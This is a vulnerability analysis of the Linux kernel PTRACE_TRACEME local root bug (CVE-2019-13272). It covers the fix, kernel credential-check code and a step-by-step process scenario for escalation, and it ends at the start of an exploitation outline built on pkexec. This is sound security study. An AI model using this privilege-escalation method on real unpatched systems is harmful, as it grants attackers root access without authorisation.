PTRACE_TRACEME (CVE-2019-13272) local privilege escalation analysis

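The PTRACE_TRACEME vulnerability is a kernel privilege-escalation bug found by Jann Horn in July 2019. Both the way it was found and the way it is exploited are worth studying; this article records my own learning process.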

author: Gengjia Chen (chengjia4574@gmail.com) of IceSwordLab, qihoo 360

The patch

We start the analysis from the patch, ptrace: Fix ->ptracer_cred handling for PTRACE_TRACEME.

Fix two issues:

// Issue 1: the RCU reference to the cred
When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU   
reference to the parent's objective credentials, then give that pointer
to get_cred().  However, the object lifetime rules for things like
struct cred do not permit unconditionally turning an RCU reference into
a stable reference.

// Issue 2: which tracer cred the tracee records
PTRACE_TRACEME records the parent's credentials as if the parent was 
acting as the subject, but that's not the case.  If a malicious
unprivileged child uses PTRACE_TRACEME and the parent is privileged, and
at a later point, the parent process becomes attacker-controlled
(because it drops privileges and calls execve()), the attacker ends up
with control over two processes with a privileged ptrace relationship,
which can be abused to ptrace a suid binary and obtain root privileges.


Fix both of these by always recording the credentials of the process
that is requesting the creation of the ptrace relationship:
current_cred() can't change under us, and current is the proper subject
for access control.

That was the patch description; the patch code follows.

diff --git a/kernel/ptrace.c b/kernel/ptrace.c
index 8456b6e..705887f 100644
--- a/kernel/ptrace.c
+++ b/kernel/ptrace.c
@@ -79,9 +79,7 @@ void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
  */
 static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
 {
-    rcu_read_lock();
-    __ptrace_link(child, new_parent, __task_cred(new_parent));
-    rcu_read_unlock();
+    __ptrace_link(child, new_parent, current_cred());
 }

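According to the description, the patch fixes two issues:

1, the RCU reference issue, fixed in code by removing the RCU lock;
2, the issue caused by the tracee recording the tracer process's cred.

This article ignores the first issue and analyzes only the second, which can be used for local privilege escalation.

The description makes the second issue sound complicated, and we will come back to it later. The code change itself is very simple:
‘__task_cred(new_parent)’ becomes ‘current_cred()’, so the recorded cred changes from the cred of new_parent (the tracer) to the cred of the current process.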

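Vulnerability analysis

ptrace is a system call that lets one process (the tracer) observe and control the execution of another process (the tracee), and inspect and modify its memory image and registers. It is mainly used to implement breakpoint debugging and system call tracing.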

   1    396  kernel/ptrace.c <<ptrace_attach>>
             ptrace_link(task, current);  // links the target process 'task' (to be traced)
                      //  with the current process 'current', which initiates the trace
   2    469  kernel/ptrace.c <<ptrace_traceme>>
             ptrace_link(current, current->real_parent);  // links the current process 'current',
                              // which initiates the trace, with its
                              // parent 'current->real_parent'
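There are two ways to establish a trace relationship:

1, a process calls fork and the child then issues PTRACE_TRACEME on its own; this is initiated by the tracee and corresponds to the kernel function ptrace_traceme
2, a process issues PTRACE_ATTACH or PTRACE_SEIZE to trace another process; this is initiated by the tracer and corresponds to the kernel function ptrace_attach

Either way, ptrace_link is eventually called to establish the trace relationship between tracer and tracee:

ptrace_attach links ‘task’ (tracee) and ‘current’ (tracer)
ptrace_traceme links ‘current’ (tracee) and ‘current->real_parent’ (tracer)

Keep in mind exactly which task is the tracer and which is the tracee in each mode, because that is the crux of the vulnerability.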

static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
{
        rcu_read_lock();
        __ptrace_link(child, new_parent, __task_cred(new_parent));
        rcu_read_unlock();
}

void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
                   const struct cred *ptracer_cred)
{
        BUG_ON(!list_empty(&child->ptrace_entry));
        list_add(&child->ptrace_entry, &new_parent->ptraced); // 1. add the child to the new parent's ptraced list
        child->parent = new_parent; // 2. store the new parent's address in the parent pointer
        child->ptracer_cred = get_cred(ptracer_cred); // 3. save ptracer_cred; this is the only field we care about
}

The key step in establishing a trace relationship is that the tracee records the tracer's cred in its own ‘ptracer_cred’ field; the name is self-explanatory.
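The bookkeeping above can be mimicked in user space to see which credentials end up recorded on each path. This is only a sketch: the `struct cred` and `struct task` below are hypothetical stand-ins with a handful of fields, the `model_*` names are mine, and the list handling of the real `__ptrace_link` is left out.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical user-space stand-ins for the kernel structures. */
struct cred { int usage; unsigned euid; };
struct task {
    struct cred *cred;          /* the task's own credentials */
    struct task *real_parent;   /* set at fork time */
    struct task *parent;        /* the tracer once a link exists */
    struct cred *ptracer_cred;  /* recorded when the link is made */
};

/* Mirrors get_cred(): take a reference and hand the pointer back. */
static struct cred *model_get_cred(struct cred *c) { c->usage++; return c; }

/* Mirrors __ptrace_link() without the ptraced list handling. */
static void model_link(struct task *child, struct task *new_parent,
                       struct cred *ptracer_cred)
{
    assert(child->ptracer_cred == NULL);  /* loosely stands in for the BUG_ON */
    child->parent = new_parent;
    child->ptracer_cred = model_get_cred(ptracer_cred);
}

/* Pre-patch ptrace_link(): always records new_parent's credentials. */
static void model_ptrace_link_prepatch(struct task *child, struct task *new_parent)
{
    model_link(child, new_parent, new_parent->cred);
}

/* PTRACE_ATTACH path: the caller (current) is the tracer. */
static void model_attach(struct task *current, struct task *target)
{
    model_ptrace_link_prepatch(target, current);
}

/* PTRACE_TRACEME path: the caller is the tracee, its parent becomes the tracer. */
static void model_traceme(struct task *current)
{
    model_ptrace_link_prepatch(current, current->real_parent);
}
```

On the attach path the recorded cred belongs to the caller; on the traceme path it belongs to a different process, the parent, which never asked for the link.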

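The ptracer_cred concept was introduced by a 2016 patch, ptrace: Capture the ptracer’s creds not PT_PTRACE_CAP. Its purpose is to support a security check when the tracee calls exec to load a setuid executable.

Why is this check needed?

The exec family of functions replaces the process image. If the executed file has the setuid bit set, the process's euid is changed to the uid of the file's owner when the file runs. If the owner is more privileged than the process calling exec, running such a setuid executable elevates privileges.

Suppose the process calling exec is itself a tracee. After it has elevated itself by running a setuid executable, the tracer can still modify the tracee's registers and memory at any time, so a low-privileged tracer could drive the tracee into performing operations beyond the tracer's own privileges.

The kernel obviously must not allow that. So when the trace relationship is established, the tracee saves the tracer's cred (ptracer_cred). Later, during exec, if the executable has the setuid bit set, the kernel checks the privileges of ‘ptracer_cred’. If they are insufficient, the setuid elevation is not applied and the setuid executable runs with the process's original privileges.

The code for this process is analyzed below (all code analysis in this article is based on v4.19-rc8).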

do_execve
  -> __do_execve_file
  -> prepare_binprm 
      -> bprm_fill_uid
      -> security_bprm_set_creds
          ->cap_bprm_set_creds
          -> ptracer_capable
          ->selinux_bprm_set_creds
          ->(apparmor_bprm_set_creds)
          ->(smack_bprm_set_creds)
          ->(tomoyo_bprm_set_creds)

As shown above, the privilege-related work of execve happens mainly in ‘prepare_binprm’.

    1567 int prepare_binprm(struct linux_binprm *bprm)
    1568 {
    1569         int retval;
    1570         loff_t pos = 0;
    1571 
    1572         bprm_fill_uid(bprm); // <-- first pass at filling in the new process's cred
    1573 
    1574         /* fill in binprm security blob */
    1575         retval = security_bprm_set_creds(bprm); // <-- security checks,
                             // which may modify the new process's cred
    1576         if (retval)
    1577                 return retval;
    1578         bprm->called_set_creds = 1;
    1579 
    1580         memset(bprm->buf, 0, BINPRM_BUF_SIZE);
    1581         return kernel_read(bprm->file, bprm->buf, BINPRM_BUF_SIZE, &pos);
    1582 }

As shown above, ‘bprm_fill_uid’ is called first to fill in the new process's cred provisionally, then ‘security_bprm_set_creds’ runs the security checks and may modify the new cred.

    1509 static void bprm_fill_uid(struct linux_binprm *bprm)
    1510 {
    1511         struct inode *inode;
    1512         unsigned int mode;
    1513         kuid_t uid;
    1514         kgid_t gid;
    1515 
    1516         /*
    1517          * Since this can be called multiple times (via prepare_binprm),
    1518          * we must clear any previous work done when setting set[ug]id
    1519          * bits from any earlier bprm->file uses (for example when run
    1520          * first for a setuid script then again for its interpreter).
    1521          */
    1522         bprm->cred->euid = current_euid(); // <--- start from the current process's euid
    1523         bprm->cred->egid = current_egid();
    1524 
    1525         if (!mnt_may_suid(bprm->file->f_path.mnt))
    1526                 return;
    1527 
    1528         if (task_no_new_privs(current))
    1529                 return;
    1530 
    1531         inode = bprm->file->f_path.dentry->d_inode;
    1532         mode = READ_ONCE(inode->i_mode);
    1533         if (!(mode & (S_ISUID|S_ISGID))) // <---------- no setuid/setgid bit on the executable: return here
    1534                 return;
    1535 
    1536         /* Be careful if suid/sgid is set */
    1537         inode_lock(inode);
    1538 
    1539         /* reload atomically mode/uid/gid now that lock held */
    1540         mode = inode->i_mode;
    1541         uid = inode->i_uid; // <---- the file's i_uid, used below if S_ISUID is set
    1542         gid = inode->i_gid;
    1543         inode_unlock(inode);
    1544 
    1545         /* We ignore suid/sgid if there are no mappings for them in the ns */
    1546         if (!kuid_has_mapping(bprm->cred->user_ns, uid) ||
    1547                  !kgid_has_mapping(bprm->cred->user_ns, gid))
    1548                 return;
    1549 
    1550         if (mode & S_ISUID) {
    1551                 bprm->per_clear |= PER_CLEAR_ON_SETID;
    1552                 bprm->cred->euid = uid; // <------ use the file's i_uid as the new process's euid
    1553         }
    1554 
    1555         if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
    1556                 bprm->per_clear |= PER_CLEAR_ON_SETID;
    1557                 bprm->cred->egid = gid;
    1558         }
    1559 }

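Two lines matter here:

Line 1522 assigns the current euid to the new euid, so most processes keep the same privileges across execve
Line 1552: if the file has the suid bit, the uid of the file's owner is assigned to the new euid. This is how setuid is implemented: the new euid becomes the uid of the owner of the executable, and if the owner is a privileged user, this is where the privilege elevation happens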
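The two lines can be condensed into a small user-space function. It is a rough model only: `struct exec_ctx` and `model_fill_euid` are names made up for this sketch, the gid half is dropped, and the user-namespace mapping check from lines 1546-1548 is not modelled.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Hypothetical summary of the state bprm_fill_uid() looks at. */
struct exec_ctx {
    uid_t current_euid;   /* euid of the process calling execve() */
    bool mnt_nosuid;      /* the file lives on a nosuid mount */
    bool no_new_privs;    /* the caller has no_new_privs set */
};

/* Returns the provisional euid chosen for the new image. */
static uid_t model_fill_euid(const struct exec_ctx *ctx, mode_t file_mode,
                             uid_t file_owner)
{
    assert(ctx != NULL);
    uid_t euid = ctx->current_euid;        /* line 1522: keep the caller's euid */

    if (ctx->mnt_nosuid || ctx->no_new_privs)
        return euid;                       /* setuid bit is ignored entirely */

    if (file_mode & S_ISUID)               /* line 1552: take the file owner's uid */
        euid = file_owner;

    return euid;
}
```

For a file with mode 04755 owned by uid 0, a caller with euid 1000 provisionally gets euid 0; with mode 0755 it keeps 1000.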

However, this euid is still not final; security_bprm_set_creds performs further security checks.

security_bprm_set_creds calls into the LSM framework.

In the kernel version I analyzed, five security modules implement the ‘bprm_set_creds’ hook. The check functions are:

cap_bprm_set_creds
selinux_bprm_set_creds
apparmor_bprm_set_creds
smack_bprm_set_creds
tomoyo_bprm_set_creds

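Which of these hook functions actually run depends on the kernel configuration. In principle, if every LSM is enabled, all of the functions above that implement the ‘bprm_set_creds’ hook are executed.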
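A hook chain of this kind can be pictured as an array of function pointers walked in order. The sketch below assumes that the walk stops at the first hook returning non-zero, which is my understanding of how the LSM call macro behaves in this kernel generation; `struct binprm_model`, the two sample hooks and `model_call_hooks` are hypothetical names, not kernel API.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Hypothetical stand-in for struct linux_binprm; it only counts hook calls. */
struct binprm_model { int calls; };

typedef int (*bprm_hook_fn)(struct binprm_model *);

/* Sample hooks: one that accepts the exec and one that refuses it. */
static int hook_allow(struct binprm_model *b) { b->calls++; return 0; }
static int hook_deny(struct binprm_model *b)  { b->calls++; return -EPERM; }

/* Walk the registered hooks in order; the first non-zero result ends the walk. */
static int model_call_hooks(const bprm_hook_fn *hooks, size_t n,
                            struct binprm_model *b)
{
    assert(hooks != NULL || n == 0);
    for (size_t i = 0; i < n; i++) {
        int rc = hooks[i](b);
        if (rc != 0)
            return rc;
    }
    return 0;
}
```

With the chain `{hook_allow, hook_deny, hook_allow}` the third hook is never reached and the error from the second one is returned to the caller.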

In my analysis environment only cap_bprm_set_creds and selinux_bprm_set_creds actually run.

Of these, the one that affects euid is ‘cap_bprm_set_creds’.

    815 int cap_bprm_set_creds(struct linux_binprm *bprm)
    816 {
    817         const struct cred *old = current_cred();
    818         struct cred *new = bprm->cred;
    819         bool effective = false, has_fcap = false, is_setid;
    820         int ret;
    821         kuid_t root_uid;
    ===================== skip ======================
    838         /* Don't let someone trace a set[ug]id/setpcap binary with the revised
    839          * credentials unless they have the appropriate permit.
    840          *
    841          * In addition, if NO_NEW_PRIVS, then ensure we get no new privs.
    842          */
    843         is_setid = __is_setuid(new, old) || __is_setgid(new, old);  
    844 
    845         if ((is_setid || __cap_gained(permitted, new, old)) && // <---- is this a setid program?
    846             ((bprm->unsafe & ~LSM_UNSAFE_PTRACE) || 
    847              !ptracer_capable(current, new->user_ns))) { // <----- if the process calling execve is traced and the program is setuid, an extra privilege check is needed
    848                 /* downgrade; they get no more than they had, and maybe less */
    849                 if (!ns_capable(new->user_ns, CAP_SETUID) ||
    850                     (bprm->unsafe & LSM_UNSAFE_NO_NEW_PRIVS)) {
    851                         new->euid = new->uid; // <----- if the check fails, reset the new process's euid to the original uid
    852                         new->egid = new->gid;
    853                 }
    854                 new->cap_permitted = cap_intersect(new->cap_permitted,
    855                                                    old->cap_permitted);
    856         }
    857 
    858         new->suid = new->fsuid = new->euid;
    859         new->sgid = new->fsgid = new->egid;
    ===================== skip ======================
}

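As shown above:

Line 845 checks whether the new euid differs from the original uid (from the analysis of bprm_fill_uid we know they differ when the executed file has the setuid bit), so this is equivalent to checking whether the executable is a setid program
Line 847 checks whether this process is a tracee

If both conditions hold, ptracer_capable is called to perform the privilege check; if the check fails, the downgrade branch is taken

Line 851 sets new->euid back to new->uid, which means the elevation done in bprm_fill_uid may be undone here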
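The downgrade decision can be reduced to a few booleans. In this sketch `struct creds_model`, `struct exec_state` and `model_final_euid` are invented names, only the uid half is modelled, and the `__cap_gained` term and the capability masking on lines 854-855 are left out.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <sys/types.h>

/* Hypothetical, trimmed-down view of a credential set. */
struct creds_model { uid_t uid, euid; };

/* Inputs that cap_bprm_set_creds() consults, flattened to booleans. */
struct exec_state {
    bool other_unsafe;       /* bprm->unsafe has bits besides LSM_UNSAFE_PTRACE */
    bool ptracer_ok;         /* what ptracer_capable() returned */
    bool caller_has_setuid;  /* the caller holds CAP_SETUID */
    bool no_new_privs;       /* LSM_UNSAFE_NO_NEW_PRIVS is set */
};

/* Returns the euid the new image ends up with. */
static uid_t model_final_euid(const struct creds_model *old,
                              struct creds_model next,
                              const struct exec_state *st)
{
    assert(old != NULL && st != NULL);
    bool is_setid = next.euid != old->uid;             /* line 843, uid half */

    if (is_setid && (st->other_unsafe || !st->ptracer_ok)) {
        /* downgrade branch, lines 849-853 */
        if (!st->caller_has_setuid || st->no_new_privs)
            next.euid = next.uid;                      /* line 851 */
    }
    return next.euid;
}
```

A traced uid-1000 process executing a root-owned setuid file keeps euid 0 only when `ptracer_ok` is true; otherwise it falls back to 1000.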

    499 bool ptracer_capable(struct task_struct *tsk, struct user_namespace *ns)
    500 {
    501         int ret = 0;  /* An absent tracer adds no restrictions */
    502         const struct cred *cred;
    503         rcu_read_lock();
    504         cred = rcu_dereference(tsk->ptracer_cred); // <----- fetch the ptracer_cred saved by ptrace_link
    505         if (cred)
    506                 ret = security_capable_noaudit(cred, ns, CAP_SYS_PTRACE); // <-------- enter the LSM framework for the security check
    507         rcu_read_unlock();
    508         return (ret == 0);
    509 }

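As shown above:

Line 504 fetches ‘tsk->ptracer_cred’
Line 506 enters the LSM framework to check ‘tsk->ptracer_cred’

Here the variable at the heart of this vulnerability, ‘tsk->ptracer_cred’, finally shows up. As described earlier, it is the tracer's cred that the tracee saved when the trace relationship was established.

When the tracee later calls execve on a suid executable, ptracer_capable is called and the LSM framework judges the privileges of ‘ptracer_cred’.

We do not analyze the LSM capable hook here. In short, the check passes if the recorded cred holds CAP_SYS_PTRACE in the given user namespace (which is the case when the tracer is root), and fails otherwise.

As analyzed above, if ptracer_capable fails, the elevated new->euid is taken back.

For example, say A ptraces B and B calls execve on ‘/usr/bin/passwd’. By the code above, if A is root, B runs passwd with euid root; otherwise B keeps its original privileges.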
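The A/B example can be replayed with a toy version of ptracer_capable. The types and function names below are hypothetical, the capability check is collapsed into a single boolean, and user namespaces are ignored.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical credential: only the one capability that matters here. */
struct cred_model { bool cap_sys_ptrace; };

/* Hypothetical task: ptracer_cred stays NULL while nobody traces it. */
struct task_model { const struct cred_model *ptracer_cred; };

/* Mirrors the shape of ptracer_capable(): no tracer means no restriction. */
static bool model_ptracer_capable(const struct task_model *tsk)
{
    assert(tsk != NULL);
    if (tsk->ptracer_cred == NULL)
        return true;
    return tsk->ptracer_cred->cap_sys_ptrace;
}

/* euid that B gets when it executes a root-owned setuid file such as passwd. */
static unsigned model_passwd_euid(const struct task_model *b, unsigned b_uid)
{
    return model_ptracer_capable(b) ? 0u : b_uid;
}
```

With a root tracer the function yields 0, with an unprivileged tracer it yields B's own uid, and with no tracer at all the setuid execution is not restricted.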

kernel/ptrace.c <<ptrace_traceme>>
             ptrace_link(current, current->real_parent);  

static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
{
        rcu_read_lock();
        __ptrace_link(child, new_parent, __task_cred(new_parent));
        rcu_read_unlock();
}

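Back to the vulnerable code: why is it wrong for traceme to record the parent's cred when establishing the trace link? Isn't the parent the tracer at that moment?

We use Jann Horn's example to show why the tracer's cred must not be used when a trace link is established through traceme.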

 - 1, task A: fork()s a child, task B
 - 2, task B: fork()s a child, task C
 - 3, task B: execve(/some/special/suid/binary)
 - 4, task C: PTRACE_TRACEME (creates privileged ptrace relationship)
 - 5, task C: execve(/usr/bin/passwd)
 - 6, task B: drop privileges (setresuid(getuid(), getuid(), getuid()))
 - 7, task B: become dumpable again (e.g. execve(/some/other/binary))
 - 8, task A: PTRACE_ATTACH to task B
 - 9, task A: use ptrace to take control of task B
 - 10, task B: use ptrace to take control of task C

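The scenario involves three processes: A, B and C.

Step 4: when task C uses PTRACE_TRACEME to establish a trace link with B, B has euid = 0 (it has just executed a suid binary), so the ptracer_cred recorded by C also has euid 0
Step 5: task C then calls execve(suid binary). By the analysis above, C's ptracer_cred is privileged, so ptracer_capable passes and after execve task C's euid is elevated to 0. Note that the trace link between B and C is still in effect
Step 6: task B calls setresuid to drop its privileges, so that task A is able to attach to it
Steps 8 and 9: task A uses PTRACE_ATTACH to establish a trace link with B. A and B are both unprivileged, and from then on A can make B do anything
Step 10: task B controls task C to perform privileged operations

By the code analysis so far, the first nine steps all work. What about step 10?

At step 10, task B itself is unprivileged, task C has euid root, and the trace link between B and C is in effect. Under these conditions, can B send ptrace requests that make C perform arbitrary operations, including privileged ones?

Let's answer that by reading the code.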


    1111 SYSCALL_DEFINE4(ptrace, long, request, long, pid, unsigned long, addr,
    1112                 unsigned long, data)
    1113 {
    1114         struct task_struct *child;
    1115         long ret;
    1116 
    1117         if (request == PTRACE_TRACEME) {
    1118                 ret = ptrace_traceme(); // <----- traceme branch
    1119                 if (!ret)
    1120                         arch_ptrace_attach(current);
    1121                 goto out;
    1122         }
    1123 
    1124         child = find_get_task_by_vpid(pid);
    1125         if (!child) {
    1126                 ret = -ESRCH;
    1127                 goto out;
    1128         }
    1129 
    1130         if (request == PTRACE_ATTACH || request == PTRACE_SEIZE) {
    1131                 ret = ptrace_attach(child, request, addr, data); // <------ attach branch
    1132                 /*
    1133                  * Some architectures need to do book-keeping after
    1134                  * a ptrace attach.
    1135                  */
    1136                 if (!ret)
    1137                         arch_ptrace_attach(child);
    1138                 goto out_put_task_struct;
    1139         }
    1140 
    1141         ret = ptrace_check_attach(child, request == PTRACE_KILL ||
    1142                                   request == PTRACE_INTERRUPT);
    1143         if (ret < 0)
    1144                 goto out_put_task_struct;
    1145 
    1146         ret = arch_ptrace(child, request, addr, data); // <---- all other ptrace requests
    1147         if (ret || request != PTRACE_DETACH)
    1148                 ptrace_unfreeze_traced(child);
    1149 
    1150  out_put_task_struct:
    1151         put_task_struct(child);
    1152  out:
    1153         return ret;
    1154 }

As shown above, a trace link already exists between task B and task C, so B can send ptrace requests to C directly, and they go to arch_ptrace.

arch/x86/kernel/ptrace.c

arch_ptrace 
    -> ptrace_request 
        -> generic_ptrace_peekdata
           generic_ptrace_pokedata 
            -> ptrace_access_vm 
                -> ptracer_capable 

 kernel/ptrace.c
 884 int ptrace_request(struct task_struct *child, long request,
 885                    unsigned long addr, unsigned long data)
 886 {
 887         bool seized = child->ptrace & PT_SEIZED;
 888         int ret = -EIO;
 889         siginfo_t siginfo, *si;
 890         void __user *datavp = (void __user *) data;
 891         unsigned long __user *datalp = datavp;
 892         unsigned long flags;
 893 
 894         switch (request) {
 895         case PTRACE_PEEKTEXT:
 896         case PTRACE_PEEKDATA:
 897                 return generic_ptrace_peekdata(child, addr, data);
 898         case PTRACE_POKETEXT:
 899         case PTRACE_POKEDATA:
 900                 return generic_ptrace_pokedata(child, addr, data);
 901 
 =================== skip ================
 1105 }


 1156 int generic_ptrace_peekdata(struct task_struct *tsk, unsigned long addr,
 1157                             unsigned long data)
 1158 {
 1159         unsigned long tmp;
 1160         int copied;
 1161 
 1162         copied = ptrace_access_vm(tsk, addr, &tmp, sizeof(tmp), FOLL_FORCE); // <--- calls ptrace_access_vm
 1163         if (copied != sizeof(tmp))
 1164                 return -EIO;
 1165         return put_user(tmp, (unsigned long __user *)data);
 1166 }
 1167 
 1168 int generic_ptrace_pokedata(struct task_struct *tsk, unsigned long addr,
 1169                             unsigned long data)
 1170 {
 1171         int copied;
 1172 
 1173         copied = ptrace_access_vm(tsk, addr, &data, sizeof(data), // <---- calls ptrace_access_vm
 1174                         FOLL_FORCE | FOLL_WRITE);
 1175         return (copied == sizeof(data)) ? 0 : -EIO;
 1176 }

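As shown above, when the tracer wants to make the tracee run new code, it sends requests that read and write the tracee's text and data; the corresponding requests are PTRACE_PEEKTEXT / PTRACE_PEEKDATA / PTRACE_POKETEXT / PTRACE_POKEDATA.

All of these reads and writes are ultimately implemented by ptrace_access_vm.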

    kernel/ptrace.c
    38 int ptrace_access_vm(struct task_struct *tsk, unsigned long addr,
    39                      void *buf, int len, unsigned int gup_flags)
    40 {
    41         struct mm_struct *mm;
    42         int ret;
    43 
    44         mm = get_task_mm(tsk);
    45         if (!mm)
    46                 return 0;
    47 
    48         if (!tsk->ptrace ||
    49             (current != tsk->parent) ||
    50             ((get_dumpable(mm) != SUID_DUMP_USER) &&
    51              !ptracer_capable(tsk, mm->user_ns))) { // < ----- ptracer_capable again
    52                 mmput(mm);
    53                 return 0;
    54         }
    55 
    56         ret = __access_remote_vm(tsk, mm, addr, buf, len, gup_flags);
    57         mmput(mm);
    58 
    59         return ret;
    60 }

    kernel/capability.c
    499 bool ptracer_capable(struct task_struct *tsk, struct user_namespace *ns)
    500 {
    501         int ret = 0;  /* An absent tracer adds no restrictions */
    502         const struct cred *cred;
    503         rcu_read_lock();
    504         cred = rcu_dereference(tsk->ptracer_cred);
    505         if (cred)
    506                 ret = security_capable_noaudit(cred, ns, CAP_SYS_PTRACE);
    507         rcu_read_unlock();
    508         return (ret == 0);
    509 }

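As shown above, ptrace_access_vm calls the ‘ptracer_capable’ function analyzed earlier to decide whether the request may proceed. This is the second place where ‘ptracer_capable’ is used.

From our earlier analysis, the ptracer_cred saved by task C at this point is a privileged cred, so ptracer_capable passes. That answers the question above: in this situation the unprivileged task B can send ptrace requests to read and write the memory and text of the root-privileged task C.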
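The condition on lines 48-51 of ptrace_access_vm can be written out as a plain predicate. This is a sketch with hypothetical types: tasks are identified by an integer id, and the ptracer_capable result is passed in as a flag. The `DUMP_*` constants mirror the kernel's `SUID_DUMP_*` values; after a setuid exec the dumpable state is normally no longer "user" (it follows the `fs.suid_dumpable` sysctl), which is why the ptracer_cred check is the term that decides the outcome for task C.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Same numeric values as the kernel's SUID_DUMP_DISABLE/USER/ROOT. */
enum { DUMP_DISABLE = 0, DUMP_USER = 1, DUMP_ROOT = 2 };

/* Hypothetical flattened view of the tracee seen by ptrace_access_vm(). */
struct tracee_model {
    bool traced;                /* tsk->ptrace != 0 */
    int tracer_id;              /* identity of tsk->parent */
    int dumpable;               /* get_dumpable(mm) */
    bool ptracer_cred_capable;  /* what ptracer_capable() would return */
};

/* True when the caller may read or write the tracee's memory. */
static bool model_may_access_vm(const struct tracee_model *t, int caller_id)
{
    assert(t != NULL);
    if (!t->traced)
        return false;
    if (caller_id != t->tracer_id)
        return false;
    if (t->dumpable != DUMP_USER && !t->ptracer_cred_capable)
        return false;
    return true;
}
```

Note that the caller's own current privileges appear nowhere in the predicate; only the identity of the tracer and the cred recorded at link time are consulted.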

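So the privileged ptracer_cred recorded by task C plays two roles:

1, it lets task C elevate itself by calling execve(suid binary)
2, it lets the unprivileged task B use ptrace to read and write task C's text and data, and thus make task C do anything

Put together, these two points amount to a complete privilege escalation.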
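The whole chain for tasks B and C can be replayed in a few lines of ordinary C. Everything here is a model with invented names: credentials are immutable objects that a task swaps when its privileges change, and the pre-patch link simply stores a pointer to whatever cred the parent holds at that moment.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical immutable credential objects. */
struct cred_s { unsigned euid; bool cap_sys_ptrace; };

struct task_s {
    const struct cred_s *cred;          /* current credentials */
    const struct cred_s *ptracer_cred;  /* snapshot taken at link time */
    struct task_s *tracer;
};

static const struct cred_s ROOT_CRED = {0, true};
static const struct cred_s USER_CRED = {1000, false};

/* Replays steps 3-6 and 10; returns true if unprivileged B controls root C. */
static bool model_scenario(void)
{
    struct task_s b = {&USER_CRED, NULL, NULL};
    struct task_s c = {&USER_CRED, NULL, NULL};

    b.cred = &ROOT_CRED;                    /* step 3: B executes a suid binary */

    c.tracer = &b;                          /* step 4: C issues PTRACE_TRACEME, */
    c.ptracer_cred = b.cred;                /* pre-patch: the parent's cred is recorded */
    assert(c.tracer == &b);

    if (c.ptracer_cred->cap_sys_ptrace)     /* step 5: C executes passwd, */
        c.cred = &ROOT_CRED;                /* the elevation is kept */

    b.cred = &USER_CRED;                    /* step 6: B drops privileges */

    /* step 10: the access check looks at the stale snapshot, not at B's cred */
    bool b_unprivileged = b.cred->euid != 0;
    bool c_is_root = c.cred->euid == 0;
    bool access_ok = c.tracer == &b && c.ptracer_cred->cap_sys_ptrace;
    return b_unprivileged && c_is_root && access_ok;
}
```

In this model `model_scenario()` returns true: B has dropped to uid 1000, yet C still carries the root snapshot taken at step 4.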

Summary

Only after walking through the code above does this paragraph of the patch description make full sense:

PTRACE_TRACEME records the parent's credentials as if the parent was 
acting as the subject, but that's not the case.  If a malicious
unprivileged child uses PTRACE_TRACEME and the parent is privileged, and
at a later point, the parent process becomes attacker-controlled
(because it drops privileges and calls execve()), the attacker ends up
with control over two processes with a privileged ptrace relationship,
which can be abused to ptrace a suid binary and obtain root privileges.

In essence this bug resembles a TOCTOU bug: ptracer_cred is captured at traceme time but used later, during the subsequent ptrace requests, and by then the tracer's cred may no longer be the one it had when the trace link was established.

diff --git a/kernel/ptrace.c b/kernel/ptrace.c
index 8456b6e..705887f 100644
--- a/kernel/ptrace.c
+++ b/kernel/ptrace.c
@@ -79,9 +79,7 @@ void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
  */
 static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
 {
-    rcu_read_lock();
-    __ptrace_link(child, new_parent, __task_cred(new_parent));
-    rcu_read_unlock();
+    __ptrace_link(child, new_parent, current_cred());
 }

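Let's look at Jann Horn's patch again: ‘__task_cred(new_parent)’ -> ‘current_cred()’

The patch means that in the PTRACE_TRACEME case, ptracer_cred should record not the parent's cred but the caller's own cred.

So, judging by how the variable is used, I think it records not the tracer's cred but the cred of the ‘trace link creator’.

I would suggest that Jann Horn rename the variable to ptracelinkcreater_cred: when the trace link is created by PTRACE_ATTACH it equals the tracer's cred, and when the link is created by PTRACE_TRACEME it equals the tracee's cred. What it really records is the privilege of whoever created the trace relationship.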
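The difference between the two versions fits in one function. This is a sketch with hypothetical types; `patched` selects between the old and the new behaviour of ptrace_link, and `current` is the task making the ptrace call.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical minimal types for the comparison. */
struct cred_m { unsigned euid; };
struct task_m { const struct cred_m *cred; };

/*
 * Which credentials does the new link record?
 * Pre-patch: those of new_parent (the tracer).
 * Patched:   those of current (whoever asked for the link).
 */
static const struct cred_m *model_recorded_cred(const struct task_m *current,
                                                const struct task_m *new_parent,
                                                bool patched)
{
    assert(current != NULL && new_parent != NULL);
    return patched ? current->cred : new_parent->cred;
}
```

For PTRACE_ATTACH, `current` and `new_parent` are the same task, so both versions agree. For PTRACE_TRACEME they differ, and only the pre-patch version hands an unprivileged child the cred of a privileged parent.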

exploit

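The key to exploiting this bug is finding a suitable executable to run as task B. The executable must satisfy the following conditions:

1, an unprivileged user must be able to invoke it
2, it must pass through a phase in which it runs as root
3, after that phase it must drop privileges

(The brief elevation to root lets task C capture a root ptracer_cred; the subsequent drop lets B be ptrace-attached by an unprivileged process.)

Here are three exploits:

Jann Horn's exploit uses pkexec, which ships with desktop distributions, to start task B.

pkexec is part of the polkit authorization framework and lets an authorized user run a program as another user. With the --user option it first becomes root and then drops to the specified user, which is exactly what is needed to build process B. In addition, an executable run through polkit is needed (Jann Horn calls these helpers). A helper must be one that an ordinary user can run through pkexec without authentication (many programs run through polkit pop up an authentication dialog). The invocation looks like this:

/usr/bin/pkexec --user nonrootuser /usr/sbin/some-helper-binary

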